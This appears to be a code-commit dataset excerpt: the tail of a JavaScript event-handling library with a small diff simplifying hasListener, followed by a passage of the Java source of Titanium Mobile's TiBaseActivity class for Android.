within the callback. By default, this is the object being listened to. @description Remove an event listener @returns this @example function showListener() { // ... } // add listener myObj.on('show', showListener); // remove listener myObj.detach('show', showListener); @example // note the following WILL NOT WORK // add listener myObj.on('show', function() { alert('hi'); }); // remove listener myObj.detach('show', function() { alert('hi'); }); // this is because both callbacks are different function instances // YUI do it more like this: // add listener var listenerHandle = myObj.on('show', function() { alert('hi'); }); // remove listener listenerHandle.detach(); // the problem here is we lose chaining */ glow.events.Target.prototype.detach = function(eventName, callback) { glow.events.removeListeners(this, eventName, callback); } /** @name glow.events.Target#fire @function @param {String} eventName Name of the event to fire @param {glow.events.Event|Object} [event] Event object to pass into listeners. You can provide a simple object of key / value pairs which will be added as properties of a glow.events.Event instance. @description Fire an event @returns glow.events.Event @example myObj.fire('show'); @example // adding properties to the event object myBall.fire('bounce', { velocity: 30 }); @example // BallBounceEvent extends glow.events.Event but has extra methods myBall.fire( 'bounce', new BallBounceEvent(myBall) ); */ glow.events.Target.prototype.fire = function(eventName, event) { return callListeners(this, eventName, event); } /** @name glow.events.Event @class @param {Object} [properties] Properties to add to the Event instance. Each key-value pair in the object will be added to the Event as properties @description Describes an event that occurred You don't need to create instances of this class if you're simply listening to events. One will be provided as the first argument in your callback. @example // creating a simple event object var event = new glow.events.Event({ velocity: 50, direction: 180 }); // 'velocity' and 'direction' are simple made-up properties // you may want to add to your event object @example // inheriting from glow.events.Event to make a more // specialised event object function RocketEvent() { // ... } // inherit from glow.events.Event glow.lang.extend(RocketEvent, glow.events.Event, { getVector: function() { return // ... } }); // firing the event rocketInstance.fire( 'landingGearDown', new RocketEvent() ); // how a user would listen to the event rocketInstance.on('landingGearDown', function(rocketEvent) { var vector = rocketEvent.getVector(); }); */ glow.events.Event = function ( obj ) { if(obj) { glow.lang.apply(this, obj); } }; /** @name glow.events.Event#attachedTo @type {Object} @description The object the listener was attached to. If null, this value will be populated by {@link glow.events.Target#fire} */ /** @name glow.events.Event#source @type Element @description The actual object/element that the event originated from. For example, you could attach a listener to an 'ol' element to listen for clicks. If the user clicked on an 'li' the source property would be the 'li' element, and 'attachedTo' would be the 'ol'. */ /** @name glow.events.Event#preventDefault @function @description Prevent the default action of the event. Eg, if the click event on a link is cancelled, the link is not followed. Returning false from an event listener has the same effect as calling this function. For custom events, it's down to whatever fired the event to decide what to do in this case. See {@link glow.events.Event#defaultPrevented defaultPrevented} @example myLinks.on('click', function(event) { event.preventDefault(); }); // same as... myLinks.on('click', function(event) { return false; }); */ glow.events.Event.prototype.preventDefault = function () { if (this[psuedoPreventDefaultKey]) { return; } this[psuedoPreventDefaultKey] = true; if (this.nativeEvent && this.nativeEvent.preventDefault) { this.nativeEvent.preventDefault(); this.nativeEvent.returnValue = false; } }; /** @name glow.events.Event#defaultPrevented @function @description Has the default been prevented for this event? This should be used by whatever fires the event to determine if it should carry out of the default action. @returns {Boolean} Returns true if {@link glow.events.Event#preventDefault preventDefault} has been called for this event. @example // fire the 'show' event // read if the default action has been prevented if ( overlayInstance.fire('show').defaultPrevented() == false ) { // go ahead and show } */ glow.events.Event.prototype.defaultPrevented = function () { return !! this[psuedoPreventDefaultKey]; }; /** @name glow.events.Event#stopPropagation @function @description Stops the event propagating. For DOM events, this stops the event bubbling up through event listeners added to parent elements. The event object is marked as having had propagation stopped (see {@link glow.events.Event#propagationStopped propagationStopped}). @example // catch all click events that are not links glow.events.addListener( document, 'click', function () { alert('document clicked'); } ); glow.events.addListener( 'a', 'click', function (e) { e.stopPropagation(); } ); */ glow.events.Event.prototype.stopPropagation = function () { if (this[psuedoStopPropagationKey]) { return; } this[psuedoStopPropagationKey] = true; var e = this.nativeEvent; if (e) { e.cancelBubble = true; if (e.stopPropagation) { e.stopPropagation(); } } }; /** @name glow.events.Event#propagationStopped @function @description Tests if propagation has been stopped for this event. @returns {Boolean} True if event propagation has been prevented. */ glow.events.Event.prototype.propagationStopped = function () { return !! this[psuedoStopPropagationKey]; }; } });
simplified hasListener slightly
src/events/events.js
simplified hasListener slightly
<ide><path>rc/events/events.js <ide> listenersForEvent = eventListeners[objIdent][eventName]; <ide> if(!listenersForEvent){ <ide> return false; <del> } <del> <del> for(var i = 0, len = listenersForEvent.length; i < len; i++){ <del> <del> return true; <del> <del> <del> } <del> <add> } <add> else{ <add> return true; <add> } <ide> } <ide> <ide> return false;
Java
apache-2.0
e0c264971e20f3e8e25ade24abac84ee56bfc424
0
mano-mykingdom/titanium_mobile,mano-mykingdom/titanium_mobile,mano-mykingdom/titanium_mobile,mano-mykingdom/titanium_mobile,mano-mykingdom/titanium_mobile,mano-mykingdom/titanium_mobile,mano-mykingdom/titanium_mobile,mano-mykingdom/titanium_mobile
/** * Appcelerator Titanium Mobile * Copyright (c) 2009-2014 by Appcelerator, Inc. All Rights Reserved. * Licensed under the terms of the Apache Public License * Please see the LICENSE included with this distribution for details. */ package org.appcelerator.titanium; import java.lang.ref.WeakReference; import java.util.ArrayList; import java.util.Iterator; import java.util.List; import java.util.Stack; import java.util.concurrent.ConcurrentHashMap; import java.util.concurrent.CopyOnWriteArrayList; import org.appcelerator.kroll.KrollDict; import org.appcelerator.kroll.KrollFunction; import org.appcelerator.kroll.KrollObject; import org.appcelerator.kroll.KrollProxy; import org.appcelerator.kroll.KrollRuntime; import org.appcelerator.kroll.common.Log; import org.appcelerator.kroll.common.TiMessenger; import org.appcelerator.titanium.TiLifecycle.OnLifecycleEvent; import org.appcelerator.titanium.TiLifecycle.OnWindowFocusChangedEvent; import org.appcelerator.titanium.TiLifecycle.interceptOnBackPressedEvent; import org.appcelerator.titanium.TiLifecycle.OnActivityResultEvent; import org.appcelerator.titanium.TiLifecycle.OnInstanceStateEvent; import org.appcelerator.titanium.TiLifecycle.OnCreateOptionsMenuEvent; import org.appcelerator.titanium.TiLifecycle.OnPrepareOptionsMenuEvent; import org.appcelerator.titanium.proxy.ActionBarProxy; import org.appcelerator.titanium.proxy.ActivityProxy; import org.appcelerator.titanium.proxy.IntentProxy; import org.appcelerator.titanium.proxy.TiViewProxy; import org.appcelerator.titanium.proxy.TiWindowProxy; import org.appcelerator.titanium.util.TiActivityResultHandler; import org.appcelerator.titanium.util.TiActivitySupport; import org.appcelerator.titanium.util.TiActivitySupportHelper; import org.appcelerator.titanium.util.TiConvert; import org.appcelerator.titanium.util.TiMenuSupport; import org.appcelerator.titanium.util.TiPlatformHelper; import org.appcelerator.titanium.util.TiUIHelper; import org.appcelerator.titanium.util.TiWeakList; import org.appcelerator.titanium.view.TiCompositeLayout; import org.appcelerator.titanium.view.TiCompositeLayout.LayoutArrangement; import android.app.Activity; import android.support.v7.app.AppCompatActivity; import android.app.Dialog; import android.content.Intent; import android.content.IntentSender; import android.content.pm.ActivityInfo; import android.content.pm.PackageManager; import android.content.res.Configuration; import android.graphics.PixelFormat; import android.hardware.SensorManager; import android.os.Build; import android.os.Bundle; import android.os.Message; import android.os.Messenger; import android.os.RemoteException; import android.util.DisplayMetrics; import android.view.KeyEvent; import android.view.Menu; import android.view.MenuItem; import android.view.OrientationEventListener; import android.view.Surface; import android.view.View; import android.view.Window; import android.view.WindowManager; import android.view.ViewGroup.LayoutParams; import com.appcelerator.aps.APSAnalytics; /** * The base class for all non tab Titanium activities. To learn more about Activities, see the * <a href="http://developer.android.com/reference/android/app/Activity.html">Android Activity documentation</a>. */ public abstract class TiBaseActivity extends AppCompatActivity implements TiActivitySupport/*, ITiWindowHandler*/ { private static final String TAG = "TiBaseActivity"; private static OrientationChangedListener orientationChangedListener = null; private OrientationEventListener orientationListener; private boolean onDestroyFired = false; private int originalOrientationMode = -1; private boolean inForeground = false; // Indicates whether this activity is in foreground or not. private TiWeakList<OnLifecycleEvent> lifecycleListeners = new TiWeakList<OnLifecycleEvent>(); private TiWeakList<OnWindowFocusChangedEvent> windowFocusChangedListeners = new TiWeakList<OnWindowFocusChangedEvent>(); private TiWeakList<interceptOnBackPressedEvent> interceptOnBackPressedListeners = new TiWeakList<interceptOnBackPressedEvent>(); private TiWeakList<OnInstanceStateEvent> instanceStateListeners = new TiWeakList<OnInstanceStateEvent>(); private TiWeakList<OnActivityResultEvent> onActivityResultListeners = new TiWeakList<OnActivityResultEvent>(); private TiWeakList<OnCreateOptionsMenuEvent> onCreateOptionsMenuListeners = new TiWeakList<OnCreateOptionsMenuEvent>(); private TiWeakList<OnPrepareOptionsMenuEvent> onPrepareOptionsMenuListeners = new TiWeakList<OnPrepareOptionsMenuEvent>(); private APSAnalytics analytics = APSAnalytics.getInstance(); public static class PermissionContextData { private final Integer requestCode; private final KrollObject context; private final KrollFunction callback; public PermissionContextData(Integer requestCode, KrollFunction callback, KrollObject context) { this.requestCode = requestCode; this.callback = callback; this.context = context; } public Integer getRequestCode() { return requestCode; } public KrollFunction getCallback() { return callback; } public KrollObject getContext() { return context; } } private static ConcurrentHashMap<Integer,PermissionContextData> callbackDataByPermission = new ConcurrentHashMap<Integer, PermissionContextData>(); protected View layout; protected TiActivitySupportHelper supportHelper; protected int supportHelperId = -1; protected TiWindowProxy window; protected TiViewProxy view; protected ActivityProxy activityProxy; protected TiWeakList<ConfigurationChangedListener> configChangedListeners = new TiWeakList<ConfigurationChangedListener>(); protected int orientationDegrees; protected TiMenuSupport menuHelper; protected Messenger messenger; protected int msgActivityCreatedId = -1; protected int msgId = -1; protected static int previousOrientation = -1; //Storing the activity's dialogs and their persistence private CopyOnWriteArrayList<DialogWrapper> dialogs = new CopyOnWriteArrayList<DialogWrapper>(); private Stack<TiWindowProxy> windowStack = new Stack<TiWindowProxy>(); public TiWindowProxy lwWindow; public boolean isResumed = false; private boolean overridenLayout; public class DialogWrapper { boolean isPersistent; Dialog dialog; WeakReference<TiBaseActivity> dialogActivity; public DialogWrapper(Dialog d, boolean persistent, WeakReference<TiBaseActivity> activity) { isPersistent = persistent; dialog = d; dialogActivity = activity; } public TiBaseActivity getActivity() { if (dialogActivity == null) { return null; } else { return dialogActivity.get(); } } public void setActivity(WeakReference<TiBaseActivity> da) { dialogActivity = da; } public Dialog getDialog() { return dialog; } public void setDialog(Dialog d) { dialog = d; } public void release() { dialog = null; dialogActivity = null; } public boolean getPersistent() { return isPersistent; } public void setPersistent(boolean p) { isPersistent = p; } } public void addWindowToStack(TiWindowProxy proxy) { if (windowStack.contains(proxy)) { Log.e(TAG, "Window already exists in stack", Log.DEBUG_MODE); return; } boolean isEmpty = windowStack.empty(); if (!isEmpty) { windowStack.peek().onWindowFocusChange(false); } windowStack.add(proxy); if (!isEmpty) { proxy.onWindowFocusChange(true); } } public void removeWindowFromStack(TiWindowProxy proxy) { proxy.onWindowFocusChange(false); boolean isTopWindow = ( (!windowStack.isEmpty()) && (windowStack.peek() == proxy) ) ? true : false; windowStack.remove(proxy); //Fire focus only if activity is not paused and the removed window was topWindow if (!windowStack.empty() && isResumed && isTopWindow) { TiWindowProxy nextWindow = windowStack.peek(); nextWindow.onWindowFocusChange(true); } } /** * Returns the window at the top of the stack. * @return the top window or null if the stack is empty. */ public TiWindowProxy topWindowOnStack() { return (windowStack.isEmpty()) ? null : windowStack.peek(); } // could use a normal ConfigurationChangedListener but since only orientation changes are // forwarded, create a separate interface in order to limit scope and maintain clarity public static interface OrientationChangedListener { public void onOrientationChanged (int configOrientationMode, int width, int height); } public static void registerOrientationListener (OrientationChangedListener listener) { orientationChangedListener = listener; } public static void deregisterOrientationListener() { orientationChangedListener = null; } public static interface ConfigurationChangedListener { public void onConfigurationChanged(TiBaseActivity activity, Configuration newConfig); } /** * @return the instance of TiApplication. */ public TiApplication getTiApp() { return (TiApplication) getApplication(); } /** * @return the window proxy associated with this activity. */ public TiWindowProxy getWindowProxy() { return this.window; } /** * Sets the window proxy. * @param proxy */ public void setWindowProxy(TiWindowProxy proxy) { this.window = proxy; } /** * Sets the proxy for our layout (used for post layout event) * * @param proxy */ public void setLayoutProxy(TiViewProxy proxy) { if (layout instanceof TiCompositeLayout) { ((TiCompositeLayout) layout).setProxy(proxy); } } /** * Sets the view proxy. * @param proxy */ public void setViewProxy(TiViewProxy proxy) { this.view = proxy; } /** * @return activity proxy associated with this activity. */ public ActivityProxy getActivityProxy() { return activityProxy; } public void addDialog(DialogWrapper d) { if (!dialogs.contains(d)) { dialogs.add(d); } } public void removeDialog(Dialog d) { for (int i = 0; i < dialogs.size(); i++) { DialogWrapper p = dialogs.get(i); if (p.getDialog().equals(d)) { p.release(); dialogs.remove(i); return; } } } public void setActivityProxy(ActivityProxy proxy) { this.activityProxy = proxy; } /** * @return the activity's current layout. */ public View getLayout() { return layout; } public void setLayout(View layout) { this.layout = layout; } public void addConfigurationChangedListener(ConfigurationChangedListener listener) { configChangedListeners.add(new WeakReference<ConfigurationChangedListener>(listener)); } public void removeConfigurationChangedListener(ConfigurationChangedListener listener) { configChangedListeners.remove(listener); } public void registerOrientationChangedListener (OrientationChangedListener listener) { orientationChangedListener = listener; } public void deregisterOrientationChangedListener() { orientationChangedListener = null; } protected boolean getIntentBoolean(String property, boolean defaultValue) { Intent intent = getIntent(); if (intent != null) { if (intent.hasExtra(property)) { return intent.getBooleanExtra(property, defaultValue); } } return defaultValue; } protected int getIntentInt(String property, int defaultValue) { Intent intent = getIntent(); if (intent != null) { if (intent.hasExtra(property)) { return intent.getIntExtra(property, defaultValue); } } return defaultValue; } protected String getIntentString(String property, String defaultValue) { Intent intent = getIntent(); if (intent != null) { if (intent.hasExtra(property)) { return intent.getStringExtra(property); } } return defaultValue; } protected void updateTitle() { if (window == null) return; if (window.hasProperty(TiC.PROPERTY_TITLE)) { String oldTitle = (String) getTitle(); String newTitle = TiConvert.toString(window.getProperty(TiC.PROPERTY_TITLE)); if (oldTitle == null) { oldTitle = ""; } if (newTitle == null) { newTitle = ""; } if (!newTitle.equals(oldTitle)) { final String fnewTitle = newTitle; runOnUiThread(new Runnable(){ public void run() { setTitle(fnewTitle); } }); } } } // Subclasses can override to provide a custom layout protected View createLayout() { LayoutArrangement arrangement = LayoutArrangement.DEFAULT; String layoutFromIntent = getIntentString(TiC.INTENT_PROPERTY_LAYOUT, ""); if (layoutFromIntent.equals(TiC.LAYOUT_HORIZONTAL)) { arrangement = LayoutArrangement.HORIZONTAL; } else if (layoutFromIntent.equals(TiC.LAYOUT_VERTICAL)) { arrangement = LayoutArrangement.VERTICAL; } // set to null for now, this will get set correctly in setWindowProxy() return new TiCompositeLayout(this, arrangement, null); } @Override public void onRequestPermissionsResult(int requestCode, String permissions[], int[] grantResults) { if (!callbackDataByPermission.isEmpty()) { handlePermissionRequestResult(requestCode, permissions, grantResults); } } private void handlePermissionRequestResult(Integer requestCode, String[] permissions, int[] grantResults) { PermissionContextData cbd = callbackDataByPermission.get(requestCode); if (cbd == null) { return; } String deniedPermissions = ""; for (int i = 0; i < grantResults.length; ++i) { if (grantResults[i] == PackageManager.PERMISSION_DENIED) { if (deniedPermissions.isEmpty()) { deniedPermissions = permissions[i]; } else { deniedPermissions = deniedPermissions + ", " + permissions[i]; } } } KrollDict response = new KrollDict(); if (deniedPermissions.isEmpty()) { response.putCodeAndMessage(0, null); } else { response.putCodeAndMessage(-1, "Permission(s) denied: " + deniedPermissions); } KrollFunction callback = cbd.getCallback(); if (callback != null) { KrollObject context = cbd.getContext(); if (context == null) { Log.w(TAG, "Permission callback context object is null"); } callback.callAsync(context, response); } else { Log.w(TAG, "Permission callback function has not been set"); } } /** * register permission request result callback for activity * * @param requestCode request code (8 Bit) to associate callback with request * @param callback callback function which receives a KrollDict with success, * code, optional message and requestCode * @param context KrollObject as required by async callback pattern */ public static void registerPermissionRequestCallback(Integer requestCode, KrollFunction callback, KrollObject context) { if (callback != null && context != null) { callbackDataByPermission.put(requestCode, new PermissionContextData(requestCode, callback, context)); } } protected void setFullscreen(boolean fullscreen) { if (fullscreen) { //getWindow().addFlags(WindowManager.LayoutParams.FLAG_FULLSCREEN); View decorView = getWindow().getDecorView(); // Hide both the navigation bar and the status bar. // SYSTEM_UI_FLAG_FULLSCREEN is only available on Android 4.1 and higher, but as // a general rule, you should design your app to hide the status bar whenever you // hide the navigation bar. int uiOptions = View.SYSTEM_UI_FLAG_HIDE_NAVIGATION | View.SYSTEM_UI_FLAG_FULLSCREEN; decorView.setSystemUiVisibility(uiOptions); } } // Subclasses can override to handle post-creation (but pre-message fire) logic @SuppressWarnings("deprecation") protected void windowCreated(Bundle savedInstanceState) { boolean fullscreen = getIntentBoolean(TiC.PROPERTY_FULLSCREEN, false); boolean modal = getIntentBoolean(TiC.PROPERTY_MODAL, false); int softInputMode = getIntentInt(TiC.PROPERTY_WINDOW_SOFT_INPUT_MODE, -1); int windowFlags = getIntentInt(TiC.PROPERTY_WINDOW_FLAGS, 0); boolean hasSoftInputMode = softInputMode != -1; setFullscreen(fullscreen); if (windowFlags > 0) { getWindow().addFlags(windowFlags); } if (modal) { if (Build.VERSION.SDK_INT < TiC.API_LEVEL_ICE_CREAM_SANDWICH) { // This flag is deprecated in API 14. On ICS, the background is not blurred but straight black. getWindow().addFlags(WindowManager.LayoutParams.FLAG_BLUR_BEHIND); } } if (hasSoftInputMode) { Log.d(TAG, "windowSoftInputMode: " + softInputMode, Log.DEBUG_MODE); getWindow().setSoftInputMode(softInputMode); } boolean useActivityWindow = getIntentBoolean(TiC.INTENT_PROPERTY_USE_ACTIVITY_WINDOW, false); if (useActivityWindow) { int windowId = getIntentInt(TiC.INTENT_PROPERTY_WINDOW_ID, -1); TiActivityWindows.windowCreated(this, windowId, savedInstanceState); } } // Record if user has set a content view manually from hyperloop code during require of app.js! @Override public void setContentView(View view) { overridenLayout = true; super.setContentView(view); } @Override public void setContentView(int layoutResID) { overridenLayout = true; super.setContentView(layoutResID); } @Override public void setContentView(View view, LayoutParams params) { overridenLayout = true; super.setContentView(view, params); } @Override /** * When the activity is created, this method adds it to the activity stack and * fires a javascript 'create' event. * @param savedInstanceState Bundle of saved data. */ protected void onCreate(Bundle savedInstanceState) { Log.d(TAG, "Activity " + this + " onCreate", Log.DEBUG_MODE); inForeground = true; TiApplication tiApp = getTiApp(); if (tiApp.isRestartPending()) { super.onCreate(savedInstanceState); if (!isFinishing()) { finish(); } return; } // If all the activities has been killed and the runtime has been disposed or the app's hosting process has // been killed, we cannot recover one specific activity because the info of the top-most view proxy has been // lost (TiActivityWindows.dispose()). In this case, we have to restart the app. if (TiBaseActivity.isUnsupportedReLaunch(this, savedInstanceState)) { Log.w(TAG, "Runtime has been disposed or app has been killed. Finishing."); super.onCreate(savedInstanceState); tiApp.scheduleRestart(250); finish(); return; } TiApplication.addToActivityStack(this); // create the activity proxy here so that it is accessible from the activity in all cases activityProxy = new ActivityProxy(this); // Increment the reference count so we correctly clean up when all of our activities have been destroyed KrollRuntime.incrementActivityRefCount(); Intent intent = getIntent(); if (intent != null) { if (intent.hasExtra(TiC.INTENT_PROPERTY_MESSENGER)) { messenger = (Messenger) intent.getParcelableExtra(TiC.INTENT_PROPERTY_MESSENGER); msgActivityCreatedId = intent.getIntExtra(TiC.INTENT_PROPERTY_MSG_ACTIVITY_CREATED_ID, -1); msgId = intent.getIntExtra(TiC.INTENT_PROPERTY_MSG_ID, -1); } if (intent.hasExtra(TiC.PROPERTY_WINDOW_PIXEL_FORMAT)) { getWindow().setFormat(intent.getIntExtra(TiC.PROPERTY_WINDOW_PIXEL_FORMAT, PixelFormat.UNKNOWN)); } } // Doing this on every create in case the activity is externally created. TiPlatformHelper.getInstance().intializeDisplayMetrics(this); if (layout == null) { layout = createLayout(); } if (intent != null && intent.hasExtra(TiC.PROPERTY_KEEP_SCREEN_ON)) { layout.setKeepScreenOn(intent.getBooleanExtra(TiC.PROPERTY_KEEP_SCREEN_ON, layout.getKeepScreenOn())); } // Set the theme of the activity before calling super.onCreate(). // On 2.3 devices, it does not work if the theme is set after super.onCreate. int theme = getIntentInt(TiC.PROPERTY_THEME, -1); if (theme != -1) { this.setTheme(theme); } // Set ActionBar into split mode must be done before the decor view has been created // we need to do this before calling super.onCreate() if (intent != null && intent.hasExtra(TiC.PROPERTY_SPLIT_ACTIONBAR)) { getWindow().setUiOptions(ActivityInfo.UIOPTION_SPLIT_ACTION_BAR_WHEN_NARROW); } // we only want to set the current activity for good in the resume state but we need it right now. // save off the existing current activity, set ourselves to be the new current activity temporarily // so we don't run into problems when we give the proxy the event Activity tempCurrentActivity = tiApp.getCurrentActivity(); tiApp.setCurrentActivity(this, this); // we need to set window features before calling onCreate this.requestWindowFeature(Window.FEATURE_PROGRESS); this.requestWindowFeature(Window.FEATURE_INDETERMINATE_PROGRESS); if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) { this.requestWindowFeature(Window.FEATURE_ACTIVITY_TRANSITIONS); } super.onCreate(savedInstanceState); windowCreated(savedInstanceState); if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_CREATE, null); activityProxy.fireEvent(TiC.EVENT_CREATE, null); } // set the current activity back to what it was originally tiApp.setCurrentActivity(this, tempCurrentActivity); // If user changed the layout during app.js load, keep that if (!overridenLayout) { setContentView(layout); } // Set the title of the activity after setContentView. // On 2.3 devices, if the title is set before setContentView, the app will crash when a NoTitleBar theme is used. updateTitle(); sendMessage(msgActivityCreatedId); // for backwards compatibility sendMessage(msgId); // store off the original orientation for the activity set in the AndroidManifest.xml // for later use originalOrientationMode = getRequestedOrientation(); orientationListener = new OrientationEventListener(this, SensorManager.SENSOR_DELAY_NORMAL) { @Override public void onOrientationChanged(int orientation) { DisplayMetrics dm = new DisplayMetrics(); getWindowManager().getDefaultDisplay().getMetrics(dm); int width = dm.widthPixels; int height = dm.heightPixels; int rotation = getWindowManager().getDefaultDisplay().getRotation(); if ((rotation == Surface.ROTATION_90 || rotation == Surface.ROTATION_270) && rotation != previousOrientation) { callOrientationChangedListener(TiApplication.getAppRootOrCurrentActivity(), width, height, rotation); } else if ((rotation == Surface.ROTATION_0 || rotation == Surface.ROTATION_180) && rotation != previousOrientation) { callOrientationChangedListener(TiApplication.getAppRootOrCurrentActivity(), width, height, rotation); } } }; if (orientationListener.canDetectOrientation() == true) { orientationListener.enable(); } else { Log.w(TAG, "Cannot detect orientation"); orientationListener.disable(); } if (window != null) { window.onWindowActivityCreated(); } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, savedInstanceState, TiLifecycle.LIFECYCLE_ON_CREATE); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } } public int getOriginalOrientationMode() { return originalOrientationMode; } public boolean isInForeground() { return inForeground; } protected void sendMessage(final int msgId) { if (messenger == null || msgId == -1) { return; } // fire an async message on this thread's queue // so we don't block onCreate() from returning TiMessenger.postOnMain(new Runnable() { public void run() { handleSendMessage(msgId); } }); } protected void handleSendMessage(int messageId) { try { Message message = TiMessenger.getMainMessenger().getHandler().obtainMessage(messageId, this); messenger.send(message); } catch (RemoteException e) { Log.e(TAG, "Unable to message creator. finishing.", e); finish(); } catch (RuntimeException e) { Log.e(TAG, "Unable to message creator. finishing.", e); finish(); } } protected TiActivitySupportHelper getSupportHelper() { if (supportHelper == null) { this.supportHelper = new TiActivitySupportHelper(this); // Register the supportHelper so we can get it back when the activity is recovered from force-quitting. supportHelperId = TiActivitySupportHelpers.addSupportHelper(supportHelper); } return supportHelper; } // Activity Support public int getUniqueResultCode() { return getSupportHelper().getUniqueResultCode(); } /** * See TiActivitySupport.launchActivityForResult for more details. */ public void launchActivityForResult(Intent intent, int code, TiActivityResultHandler resultHandler) { getSupportHelper().launchActivityForResult(intent, code, resultHandler); } /** * See TiActivitySupport.launchIntentSenderForResult for more details. */ public void launchIntentSenderForResult(IntentSender intent, int requestCode, Intent fillInIntent, int flagsMask, int flagsValues, int extraFlags, Bundle options, TiActivityResultHandler resultHandler) { getSupportHelper().launchIntentSenderForResult(intent, requestCode, fillInIntent, flagsMask, flagsValues, extraFlags, options, resultHandler); } @Override protected void onActivityResult(int requestCode, int resultCode, Intent data) { super.onActivityResult(requestCode, resultCode, data); synchronized (onActivityResultListeners.synchronizedList()) { for (OnActivityResultEvent listener : onActivityResultListeners.nonNull()) { try { TiLifecycle.fireOnActivityResultEvent(this, listener, requestCode, resultCode, data); } catch (Throwable t) { Log.e(TAG, "Error dispatching onActivityResult event: " + t.getMessage(), t); } } } getSupportHelper().onActivityResult(requestCode, resultCode, data); } @Override public void onBackPressed() { synchronized (interceptOnBackPressedListeners.synchronizedList()) { for (interceptOnBackPressedEvent listener : interceptOnBackPressedListeners.nonNull()) { try { if (listener.interceptOnBackPressed()) { return; } } catch (Throwable t) { Log.e(TAG, "Error dispatching interceptOnBackPressed event: " + t.getMessage(), t); } } } TiWindowProxy topWindow = topWindowOnStack(); if (topWindow != null && topWindow.hasListeners(TiC.EVENT_ANDROID_BACK)) { topWindow.fireEvent(TiC.EVENT_ANDROID_BACK, null); } // Override default Android behavior for "back" press // if the top window has a callback to handle the event. if (topWindow != null && topWindow.hasProperty(TiC.PROPERTY_ON_BACK)) { KrollFunction onBackCallback = (KrollFunction) topWindow.getProperty(TiC.PROPERTY_ON_BACK); onBackCallback.callAsync(activityProxy.getKrollObject(), new Object[] {}); } if (!topWindow.hasProperty(TiC.PROPERTY_ON_BACK) && !topWindow.hasListeners(TiC.EVENT_ANDROID_BACK)) { // there are no parent activities to return to // override back press to background the activity // note: 2 since there should always be TiLaunchActivity and TiActivity if (TiApplication.activityStack.size() <= 2) { if (topWindow != null && !TiConvert.toBoolean(topWindow.getProperty(TiC.PROPERTY_EXIT_ON_CLOSE), true)) { this.moveTaskToBack(true); return; } } // If event is not handled by custom callback allow default behavior. super.onBackPressed(); } } @Override public boolean dispatchKeyEvent(KeyEvent event) { boolean handled = false; TiViewProxy window; if (this.window != null) { window = this.window; } else { window = this.view; } if (window == null) { return super.dispatchKeyEvent(event); } switch(event.getKeyCode()) { case KeyEvent.KEYCODE_BACK : { if (event.getAction() == KeyEvent.ACTION_UP) { String backEvent = "android:back"; KrollProxy proxy = null; //android:back could be fired from a tabGroup window (activityProxy) //or hw window (window).This event is added specifically to the activity //proxy of a tab group in window.js if (activityProxy.hasListeners(backEvent)) { proxy = activityProxy; } else if (window.hasListeners(backEvent)) { proxy = window; } if (proxy != null) { proxy.fireEvent(backEvent, null); handled = true; } } break; } case KeyEvent.KEYCODE_CAMERA : { if (window.hasListeners(TiC.EVENT_ANDROID_CAMERA)) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent(TiC.EVENT_ANDROID_CAMERA, null); } handled = true; } // TODO: Deprecate old event if (window.hasListeners("android:camera")) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent("android:camera", null); } handled = true; } break; } case KeyEvent.KEYCODE_FOCUS : { if (window.hasListeners(TiC.EVENT_ANDROID_FOCUS)) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent(TiC.EVENT_ANDROID_FOCUS, null); } handled = true; } // TODO: Deprecate old event if (window.hasListeners("android:focus")) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent("android:focus", null); } handled = true; } break; } case KeyEvent.KEYCODE_SEARCH : { if (window.hasListeners(TiC.EVENT_ANDROID_SEARCH)) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent(TiC.EVENT_ANDROID_SEARCH, null); } handled = true; } // TODO: Deprecate old event if (window.hasListeners("android:search")) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent("android:search", null); } handled = true; } break; } case KeyEvent.KEYCODE_VOLUME_UP : { if (window.hasListeners(TiC.EVENT_ANDROID_VOLUP)) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent(TiC.EVENT_ANDROID_VOLUP, null); } handled = true; } // TODO: Deprecate old event if (window.hasListeners("android:volup")) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent("android:volup", null); } handled = true; } break; } case KeyEvent.KEYCODE_VOLUME_DOWN : { if (window.hasListeners(TiC.EVENT_ANDROID_VOLDOWN)) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent(TiC.EVENT_ANDROID_VOLDOWN, null); } handled = true; } // TODO: Deprecate old event if (window.hasListeners("android:voldown")) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent("android:voldown", null); } handled = true; } break; } } if (!handled) { handled = super.dispatchKeyEvent(event); } return handled; } @Override public boolean onCreateOptionsMenu(Menu menu) { // If targetSdkVersion is set to 11+, Android will invoke this function // to initialize the menu (since it's part of the action bar). Due // to the fix for Android bug 2373, activityProxy won't be initialized b/c the // activity is expected to restart, so we will ignore it. if (activityProxy == null) { return false; } boolean listenerExists = false; synchronized (onCreateOptionsMenuListeners.synchronizedList()) { for (OnCreateOptionsMenuEvent listener : onCreateOptionsMenuListeners.nonNull()) { try { listenerExists = true; TiLifecycle.fireOnCreateOptionsMenuEvent(this, listener, menu); } catch (Throwable t) { Log.e(TAG, "Error dispatching OnCreateOptionsMenuEvent: " + t.getMessage(), t); } } } if (menuHelper == null) { menuHelper = new TiMenuSupport(activityProxy); } return menuHelper.onCreateOptionsMenu(super.onCreateOptionsMenu(menu) || listenerExists, menu); } @Override public boolean onOptionsItemSelected(MenuItem item) { switch (item.getItemId()) { case android.R.id.home: if (activityProxy != null) { ActionBarProxy actionBarProxy = activityProxy.getActionBar(); if (actionBarProxy != null) { KrollFunction onHomeIconItemSelected = (KrollFunction) actionBarProxy .getProperty(TiC.PROPERTY_ON_HOME_ICON_ITEM_SELECTED); KrollDict event = new KrollDict(); event.put(TiC.EVENT_PROPERTY_SOURCE, actionBarProxy); if (onHomeIconItemSelected != null) { onHomeIconItemSelected.call(activityProxy.getKrollObject(), new Object[] { event }); } } } return true; default: return 